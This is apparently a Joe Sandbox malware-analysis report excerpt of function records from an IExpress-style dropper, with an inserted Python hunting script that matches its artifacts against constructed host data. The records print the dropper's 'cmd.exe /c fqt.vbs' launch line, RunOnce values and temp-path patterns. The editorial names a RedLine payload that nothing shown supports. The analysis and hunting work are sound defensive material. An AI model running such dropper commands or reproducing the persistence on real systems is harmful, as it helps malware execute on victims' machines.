                                                                      • Instruction Fuzzy Hash: 34517C21E48E4A81FA10AB28AC103BFE3A4AF55740FDD4137CB4E46295DF7CF40ACA20

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                      • String ID:
                                                                      • API String ID: 3183975587-3916222277
                                                                      • Opcode ID: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                                                      • Instruction ID: 7a8f6f2a44e5da50753c5cb4ebed11276df9dc9edf452b80b5fabdc14c58a411
                                                                      • Opcode Fuzzy Hash: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                                                      • Instruction Fuzzy Hash: 1B512A32D08B8986E760AB50E85537EF6A0FB88795FC84136D74D466A4CF7CE446CF60

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                                      • String ID: @$HeapSetInformation$Kernel32.dll
                                                                      • API String ID: 1302179841-1204263913
                                                                      • Opcode ID: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                                      • Instruction ID: 441a4ed552914a33cd7f10f47f7c17426f10043f72b38001b3c8d1a4d3c91d9d
                                                                      • Opcode Fuzzy Hash: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                                      • Instruction Fuzzy Hash: E8311A21E08E4A86FA60BB60AC4127FF6A1AF55B50FCC4136DB0D03295CF3DF4468EA0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                      • String ID:
                                                                      • API String ID: 836429354-0
                                                                      • Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                      • Instruction ID: 441144dc0ea39d5d1f23989336867bfa2006d9f543ea15198cd71480279835ed
                                                                      • Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                      • Instruction Fuzzy Hash: 07517D31A08E8995EB11EF20D8142EEB7A1FB55B84FC88172DB5E03695CF3CE50ACB50

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                      • String ID: $cmd.exe /c fqt.vbs
                                                                      • API String ID: 2654313074-1747185477
                                                                      • Opcode ID: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                                      • Instruction ID: 2bb95a4d28f1c18a785b21f8475c938c902614eeae5a9bbb7e10b9854a96063d
                                                                      • Opcode Fuzzy Hash: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                                      • Instruction Fuzzy Hash: 37512222E08E4686E7106B55ED4427EEA61FB8AB55FC89232DB1D46794CF3CB4468F10

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                      • API String ID: 3049360512-3137473940
                                                                      • Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                                      • Instruction ID: d6cefcfba1781015e677ffb20fa2996eff48ee3f17ab8422894a092f2f1804cd
                                                                      • Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                                      • Instruction Fuzzy Hash: 9D510A21E48E8A86EB10AB14EC543BEB7A5FB95745FCC5132CB4D46694CF2CF44ACB20

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                      • API String ID: 2209512893-559176071
                                                                      • Opcode ID: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                                      • Instruction ID: 618aee8084fd7b4eea22015dba9a5275706a41ae21c39e73bc4988d218ef144d
                                                                      • Opcode Fuzzy Hash: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                                      • Instruction Fuzzy Hash: 1E315C32A08F45CAD710AF64E8406AEF7A8FB99754FC84536EB8D43B58CF38E0518B50

                                                                      Similarity
                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                      • String ID: IXP$IXP%03d.TMP
                                                                      • API String ID: 1082909758-3932986939
                                                                      • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                      • Instruction ID: 1d41fe263991f0454e07e1d68081a8bc25d4e5d7ad2736411f412d9af218e24d
                                                                      • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                      • Instruction Fuzzy Hash: 72214A31E08D4586E610AB52AD503BEF691FB8EB85FC98132DE4E46795CF3CF446CA10
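The three records above (the RunOnce `wextract_cleanup0` cleanup routine, the `PendingFileRenameOperations` query and the `IXP%03d.TMP` temp-directory creation) are the artifacts a responder would carry to other hosts. Note that this string set is the one Microsoft's own WEXTRACT/IExpress self-extractor stub uses, an identification the report itself does not make, so hunting on it finds the dropper wrapper (and benign IExpress packages), not the RedLine payload. The Python below is an added editorial example, not Joe Sandbox output or tooling: it parses records in this report's format into registry keys, value names and path patterns, then checks constructed host observations against them. Assumptions not taken from the report: the numeric suffix of `wextract_cleanup0` is treated as an instance counter, the sandbox profile name `user` is wildcarded to any profile, and the embedded sample records are trimmed to the fields the parser reads.

```python
"""Parse Joe Sandbox function records into hunt artifacts and match host observations.
Editorial example, not Joe Sandbox tooling. SAMPLE_RECORDS is copied from this page
(trimmed to the fields used); CONSTRUCTED_OBSERVATIONS at the bottom are made up."""
from __future__ import annotations
import re
from dataclasses import dataclass

SAMPLE_RECORDS = """\
Similarity
• API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
• String ID: C:\\Users\\user\\AppData\\Local\\Temp\\IXP000.TMP\\$Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce$wextract_cleanup0
• Instruction Fuzzy Hash: 9D510A21E48E8A86EB10AB14EC543BEB7A5FB95745FCC5132CB4D46694CF2CF44ACB20
Similarity
• API ID: OpenQuery$CloseInfoValue
• String ID: PendingFileRenameOperations$System\\CurrentControlSet\\Control\\Session Manager$System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations
• Instruction Fuzzy Hash: 1E315C32A08F45CAD710AF64E8406AEF7A8FB99754FC84536EB8D43B58CF38E0518B50
Similarity
• API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
• String ID: IXP$IXP%03d.TMP
• Instruction Fuzzy Hash: 72214A31E08D4586E610AB52AD503BEF691FB8EB85FC98132DE4E46795CF3CF446CA10
"""
FIELD_RE = re.compile(r"^\s*•\s*(API ID|String ID|Instruction Fuzzy Hash):\s*(.*)$")

@dataclass
class FunctionRecord:
    api_id: str
    strings: list[str]   # the report joins several strings with '$'
    fuzzy_hash: str

def parse_records(text: str) -> list[FunctionRecord]:
    """Split the report text at each 'Similarity' header and collect the fields."""
    records, cur = [], {}
    for line in text.splitlines() + ["Similarity"]:       # sentinel flushes the last record
        if line.strip() == "Similarity":
            if cur:
                records.append(FunctionRecord(cur.get("API ID", ""),
                    [s for s in cur.get("String ID", "").split("$") if s],
                    cur.get("Instruction Fuzzy Hash", "")))
            cur = {}
        elif m := FIELD_RE.match(line):
            cur[m.group(1)] = m.group(2).strip()
    return records

def printf_to_regex(fmt: str) -> str:
    """Turn a printf-style name such as IXP%03d.TMP into a regex (only %d / %0Nd handled)."""
    out, i = "", 0
    while i < len(fmt):
        if m := re.match(r"%0?(\d*)d", fmt[i:]):
            out += (r"\d{%s}" % m.group(1)) if m.group(1) else r"\d+"
            i += m.end()
        else:
            out += re.escape(fmt[i]); i += 1
    return out

def concrete_path_to_regex(path: str) -> str:
    """Wildcard the profile name in a sandbox path (assumption: any user, not just 'user')."""
    parts = path.rstrip("\\").split("\\")
    return r"\\".join(r"[^\\]+" if i and parts[i - 1].lower() == "users" else re.escape(p)
                      for i, p in enumerate(parts))

def build_artifacts(records: list[FunctionRecord]) -> dict:
    """Classify each String ID by shape: drive path, registry key, printf pattern or value name."""
    art = {"keys": set(), "values": [], "paths": [], "hashes": set()}
    for rec in records:
        art["hashes"].add(rec.fuzzy_hash)
        for s in rec.strings:
            if re.match(r"[A-Za-z]:\\", s):
                art["paths"].append(re.compile(concrete_path_to_regex(s), re.I))
            elif re.match(r"(software|system)\\", s, re.I):
                art["keys"].add(s.lower())
            elif "%" in s:
                art["paths"].append(re.compile(printf_to_regex(s), re.I))
            else:   # assumption: a trailing number is an instance counter (wextract_cleanup0 -> \d+)
                m = re.fullmatch(r"(.*?)(\d+)", s)
                art["values"].append(re.compile(re.escape(m.group(1)) + r"\d+" if m else re.escape(s), re.I))
    return art

def match_observations(art: dict, observations) -> list[tuple]:
    """observations are ('registry', key, value_name) or ('path', path) tuples; returns the hits."""
    hits = []
    for obs in observations:
        if obs[0] == "registry":
            if any(obs[1].lower().endswith(k) for k in art["keys"]) \
                    and any(p.fullmatch(obs[2]) for p in art["values"]):
                hits.append(obs)
        elif obs[0] == "path" and any(p.search(obs[1]) for p in art["paths"]):
            hits.append(obs)
    return hits

# Constructed host observations (not from the report): the first and third should hit.
CONSTRUCTED_OBSERVATIONS = [
    ("registry", r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce", "wextract_cleanup3"),
    ("registry", r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive"),
    ("path", r"C:\Users\alice\AppData\Local\Temp\IXP002.TMP\payload.exe"),
    ("path", r"C:\Windows\Temp\setup.tmp"),
]

def hunt(report_text: str = SAMPLE_RECORDS, observations=CONSTRUCTED_OBSERVATIONS) -> list[tuple]:
    return match_observations(build_artifacts(parse_records(report_text)), observations)
```

The Instruction Fuzzy Hashes are collected but never compared: the report does not document the hashing scheme behind them, so similarity matching against other samples stays with the Joe Sandbox IDA plugin that produced them. On a real host the RunOnce check should also cover HKLM, since WEXTRACT writes the cleanup value under whichever hive the extracting process can reach.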
                                                                      Similarity
                                                                      • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                      • String ID:
                                                                      • API String ID: 2995914023-0
                                                                      • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                      • Instruction ID: a5be55e1518e8bbd6de821e2e34fead071d15ac5cf2f43e555c972cbe91deb59
                                                                      • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                      • Instruction Fuzzy Hash: 48513721E08E4A86E660AB61EC4137FA2A5BF54759FDC0532DB5D82294DF3CF8428E20
                                                                      APIs
                                                                        • Part of subcall function 00007FF7D6FD5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD5078
                                                                        • Part of subcall function 00007FF7D6FD5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD5089
                                                                        • Part of subcall function 00007FF7D6FD5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50AF
                                                                        • Part of subcall function 00007FF7D6FD5050: LoadResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50C0
                                                                        • Part of subcall function 00007FF7D6FD5050: LockResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50CF
                                                                        • Part of subcall function 00007FF7D6FD5050: memcpy_s.MSVCRT ref: 00007FF7D6FD50EE
                                                                        • Part of subcall function 00007FF7D6FD5050: FreeResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50FD
                                                                      • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7D6FD3123), ref: 00007FF7D6FD60C9
                                                                      • LocalFree.KERNEL32 ref: 00007FF7D6FD6142
                                                                        • Part of subcall function 00007FF7D6FD4DCC: LoadStringA.USER32 ref: 00007FF7D6FD4E60
                                                                        • Part of subcall function 00007FF7D6FD4DCC: MessageBoxA.USER32 ref: 00007FF7D6FD4EA0
                                                                        • Part of subcall function 00007FF7D6FD7700: GetLastError.KERNEL32 ref: 00007FF7D6FD7704
                                                                      Similarity
                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                      • String ID: $<None>$UPROMPT
                                                                      • API String ID: 957408736-2569542085
                                                                      • Opcode ID: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                                      • Instruction ID: 33861128af8d5cc9703712d95d688767b4aab7c991fbfd2010d24953ef1a6c17
                                                                      • Opcode Fuzzy Hash: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                                      • Instruction Fuzzy Hash: CF31A431E08A0A87E720AB60AD5037FF661EB99B84FC85136CB0E02695DF7CF0068F10
                                                                      Similarity
                                                                      • API ID: CreateFile$lstrcmp
                                                                      • String ID: *MEMCAB
                                                                      • API String ID: 1301100335-3211172518
                                                                      • Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                      • Instruction ID: 1534ca97399f4aaedebc4932f3871b6777809af91917ff86ca7cedf3a546d56a
                                                                      • Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                      • Instruction Fuzzy Hash: CA618562D08B4986F7619B19988137EBA91F755B69FC85336CB6D026C0CFBCB4468A20
                                                                      Similarity
                                                                      • API ID: FileTime$AttributesDateLocalTextWindow
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                      • API String ID: 1150793416-305352358
                                                                      • Opcode ID: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                                      • Instruction ID: bc4eb686fd5bebe30fb38ef2b104b8ef334a308691b7ff0656b3e5c2b8d5ba86
                                                                      • Opcode Fuzzy Hash: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                                      • Instruction Fuzzy Hash: 35516F72E2CE5A81EA50AB159C402BEA790FB49B50FCC5233DB4E46295CE7CF546CB60
                                                                      Similarity
                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                      • String ID:
                                                                      • API String ID: 2212493051-0
                                                                      • Opcode ID: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                                      • Instruction ID: e31cd3b45bf38cb103f33f80ae05f35e6e285b4dde355f06d77754b7598584c5
                                                                      • Opcode Fuzzy Hash: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                                      • Instruction Fuzzy Hash: 66316132F149458AE7109BA5E8046BEBBA1F749B99FD99131CE0A53B48CF3CE4468F10
                                                                      Similarity
                                                                      • API ID: AllocLocal
                                                                      • String ID: TMP4351$.TMP
                                                                      • API String ID: 3494564517-2619824408
                                                                      • Opcode ID: 115a3f27e39781d027e0477db835a776448aec340d541b983af64270222d4fc0
                                                                      • Instruction ID: b00beb066f3a77a967cd2957bc63b2e722cdab1055413d45deccb893394056f4
                                                                      • Opcode Fuzzy Hash: 115a3f27e39781d027e0477db835a776448aec340d541b983af64270222d4fc0
                                                                      • Instruction Fuzzy Hash: F3313C21E08A4986E714AB65A81036FBA50EB95BA5FC85335EB6E077D5CF3CE4068F10
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *MEMCAB
                                                                      • API String ID: 0-3211172518
                                                                      • Opcode ID: 2085e244be9a75c0329170706bb6144b0415b504333b66df14c927118817c01a
                                                                      • Instruction ID: 23a4c300d7fb651c5f5484960f910f1b8ec341a02581c5a5a64d788101a55913
                                                                      • Opcode Fuzzy Hash: 2085e244be9a75c0329170706bb6144b0415b504333b66df14c927118817c01a
                                                                      • Instruction Fuzzy Hash: 2C313921E08F4A85EA10AB11E8483AEB7A5BB44791FD84237DA5C42290DFBCF446CB20
                                                                      Similarity
                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                      • String ID:
                                                                      • API String ID: 1214682469-0
                                                                      • Opcode ID: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                                      • Instruction ID: 10ead2658565d641c1c82c3e1ace9a775ad8791d4b075d20951a4a2722d9aebc
                                                                      • Opcode Fuzzy Hash: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                                      • Instruction Fuzzy Hash: 96110031A08B4586EA109B11A84426EFA61FB59FE5FCC4635DF9D077D4DF3CE4428A14
                                                                      APIs
                                                                        • Part of subcall function 00007FF7D6FD3B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF7D6FD3A09), ref: 00007FF7D6FD3B64
                                                                        • Part of subcall function 00007FF7D6FD3B40: PeekMessageA.USER32 ref: 00007FF7D6FD3B89
                                                                        • Part of subcall function 00007FF7D6FD3B40: PeekMessageA.USER32 ref: 00007FF7D6FD3BCD
                                                                      • WriteFile.KERNELBASE ref: 00007FF7D6FD56E4
                                                                      Similarity
                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                      • String ID:
                                                                      • API String ID: 1084409-0
                                                                      • Opcode ID: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                                      • Instruction ID: a9eeba62e43c1acb4a25f4cf88ba20630b4695726043412462815a4e122a9f99
                                                                      • Opcode Fuzzy Hash: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                                      • Instruction Fuzzy Hash: C9213D21E08A4A86E711AB15EC4473EE761BB85798FD88236DA6D466A4CF7CF406CF10
                                                                      Similarity
                                                                      • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                      • String ID:
                                                                      • API String ID: 2018477427-0
                                                                      • Opcode ID: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                                      • Instruction ID: 646b8cef15e95dc942452164f507a2ef49df6ae1ac8cef7666e55a0ff85c8234
                                                                      • Opcode Fuzzy Hash: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                                      • Instruction Fuzzy Hash: B1118831D0CE4A82E6506B50AD8437FA691EB5674DFDC4232CB5C066A0CFBDF48A8B10
Similarity
• API ID: CharPrev
• String ID:
• API String ID: 122130370-0
• Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
• Instruction ID: 1d97c368adc4d5362bb76392b3231c7a27d7fefc1a07aad54a3c7800c9490357
• Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
• Instruction Fuzzy Hash: 4F018451D0CAC98AF7116B15AC4036EFA90A745BE0FDC9271DBA90A7D5CB2CF4438B54
APIs
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
• Instruction ID: cd1f390d8251e568802da9316fac31ede59dfb8fa06b85a9a691861e47002ae8
• Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
• Instruction Fuzzy Hash: E1F03C31A08B85D2D71C5F65F94117D7660EB44B58FD8823ADB1B475C4CF78E485CB10
APIs
Strings
Similarity
• API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
• String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$cmd.exe /c fqt.vbs
• API String ID: 3530494346-1703193554
• Opcode ID: 02408ae6c79d5afd0dbd1d350f378b5c084b7eca4ab1b8cbcc717c39842157fc
• Instruction ID: 020517db26e033d4150c2d3142c85f96a8cc880e8f9f1b67934fb45a005c7040
• Opcode Fuzzy Hash: 02408ae6c79d5afd0dbd1d350f378b5c084b7eca4ab1b8cbcc717c39842157fc
• Instruction Fuzzy Hash: 14714462E0CE4A86F750AB559C047BFE691AB96785FDC4132CB5D02695CF3CB5068F20
APIs
Strings
Similarity
• API ID: FreeLibrary$AddressAllocateInitializeLoadProc
• String ID: CheckTokenMembership$advapi32.dll
• API String ID: 4204503880-1888249752
• Opcode ID: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
• Instruction ID: df0e903a25c421136ba9615502f7f897042aa20c5c13e3f3894749f5c78eb3e7
• Opcode Fuzzy Hash: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
• Instruction Fuzzy Hash: 53310936A08B498AD6109F56F8442AEBBA0FB89B81F89512ADF4D43714DF3CE006CF50
APIs
Strings
Similarity
• API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 2829607268-3733053543
• Opcode ID: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
• Instruction ID: 00ad5d46c3410f5c714f65b596341d229a45f722b155b3561ae183e2d10a0800
• Opcode Fuzzy Hash: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
• Instruction Fuzzy Hash: BE21A072E18A4686E7509B60E8453BFFB61FB99745FC89136D74E02A54CF3CE0068F10
APIs
Similarity
• API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 4104442557-0
• Opcode ID: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
• Instruction ID: 21ca693fa97f57ff47270899e84745ff67fa2a8c4f6cc538e24a902bd0742ee3
• Opcode Fuzzy Hash: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
• Instruction Fuzzy Hash: 41115122A04F458AEB00EF61EC442A973A4FB19758FC81A31EB6D87754DF7CE1658750
APIs
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
• Instruction ID: 73c6046a9e059a910c999a414bb8e7e956f3af44ecf47747cdb71dab0675a396
• Opcode Fuzzy Hash: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
• Instruction Fuzzy Hash: F4B09210F65806D1D704BB619C8506A53A0BB68304FC80872C21D80120DE1CA19B8B10
APIs
Strings
Similarity
• API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
• String ID: "$:$@$RegServer
• API String ID: 1203814774-4077547207
• Opcode ID: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
• Instruction ID: ccbb2a33d5688e03d6b6486345c9448f02ab815caf736bed644ee402a05423ab
• Opcode Fuzzy Hash: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
• Instruction Fuzzy Hash: 9402A251E0CE8A45EA61AB185C1427FEBA1AF46744FDC0137DBDD0A695DE2DF4078F20
APIs
• LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D6FD35E3), ref: 00007FF7D6FD4A86
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D6FD35E3), ref: 00007FF7D6FD4AAA
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D6FD35E3), ref: 00007FF7D6FD4ACA
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D6FD35E3), ref: 00007FF7D6FD4AEC
• GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D6FD35E3), ref: 00007FF7D6FD4B1B
• CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D6FD35E3), ref: 00007FF7D6FD4B3A
• CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7D6FD35E3), ref: 00007FF7D6FD4B54
• FreeLibrary.KERNEL32 ref: 00007FF7D6FD4BF1
